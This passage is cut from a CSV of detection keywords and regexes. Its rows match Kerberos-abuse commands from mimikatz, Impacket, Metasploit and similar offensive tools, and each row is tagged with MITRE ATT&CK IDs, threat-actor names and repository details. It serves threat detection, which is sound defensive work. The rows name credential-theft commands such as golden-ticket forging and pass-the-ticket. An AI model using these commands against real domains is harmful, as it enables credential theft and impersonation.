Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","50324" "*kerberos::clist*",".{0,1000}kerberos\:\:clist.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","50325" "*kerberos::golden *.kirbi*",".{0,1000}kerberos\:\:golden\s.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","50326" "*kerberos::golden /service:*",".{0,1000}kerberos\:\:golden\s\/service\:.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation 
tool","https://github.com/gustanini/PowershellTools","1","0","N/A","N/A","10","1","76","13","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z","50327" "*kerberos::golden*",".{0,1000}kerberos\:\:golden.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","50328" "*kerberos::golden*",".{0,1000}kerberos\:\:golden.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","50329" "*kerberos::hash*",".{0,1000}kerberos\:\:hash.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","50330" "*kerberos::list*",".{0,1000}kerberos\:\:list.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - 
OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","50331" "*kerberos::list*",".{0,1000}kerberos\:\:list.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. This function lists all Kerberos tickets in memory","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","50332" "*kerberos::ptc*",".{0,1000}kerberos\:\:ptc.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts 
passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","50333" "*kerberos::ptt *.kirbi*",".{0,1000}kerberos\:\:ptt\s.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","APT20","Credential Access","https://github.com/nidem/kerberoast","1","0","N/A","N/A","N/A","10","1433","317","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z","50334" "*kerberos::ptt*",".{0,1000}kerberos\:\:ptt.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - 
T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","50335" "*kerberos::ptt*",".{0,1000}kerberos\:\:ptt.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","50336" "*kerberos::ptt*.kirbi*",".{0,1000}kerberos\:\:ptt.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz Unconstrained delegation. With administrative privileges on a server with Unconstrained Delegation set we can dump the TGTs for other users that have a connection. If we do this successfully. 
we can impersonate the victim user towards any service in the domain.","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","50337" "*kerberos::purge*",".{0,1000}kerberos\:\:purge.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","50338" "*kerberos::tgt*",".{0,1000}kerberos\:\:tgt.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","50339" "*kerberos_enumusers.*",".{0,1000}kerberos_enumusers\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","50340" "*kerberos_login_with_S4U(*",".{0,1000}kerberos_login_with_S4U\(.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","50341" "*kerberos_steal*",".{0,1000}kerberos_steal.{0,1000}","offensive_tool_keyword","LinikatzV2","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/LinikatzV2","1","1","#linux","N/A","10","2","146","15","2023-10-19T12:26:58Z","2023-10-19T11:07:53Z","50342" "*kerberos-ldap-password-hunter.sh*",".{0,1000}kerberos\-ldap\-password\-hunter\.sh.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","50343" "*kerberos-ldap-password-hunter.sh*",".{0,1000}kerberos\-ldap\-password\-hunter\.sh.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","LDAP Password Hunter is a tool which wraps features of getTGT.py (Impacket) and ldapsearch in order to look up for password stored in LDAP database","T1558.003 - T1003.003 - T1078.003 - T1212","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/oldboy21/LDAP-Password-Hunter","1","1","N/A","N/A","10","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","50344" "*kerberos-ldap-password-hunter.sh*",".{0,1000}kerberos\-ldap\-password\-hunter\.sh.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","1","N/A","N/A","7","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","50345" "*kerberosv5.py*",".{0,1000}kerberosv5\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","50346" "*Kerbeus * by RalfHacker*",".{0,1000}Kerbeus\s.{0,1000}\sby\sRalfHacker.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - 
Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","50347" "*kerbeus_cs.cna*",".{0,1000}kerbeus_cs\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - 
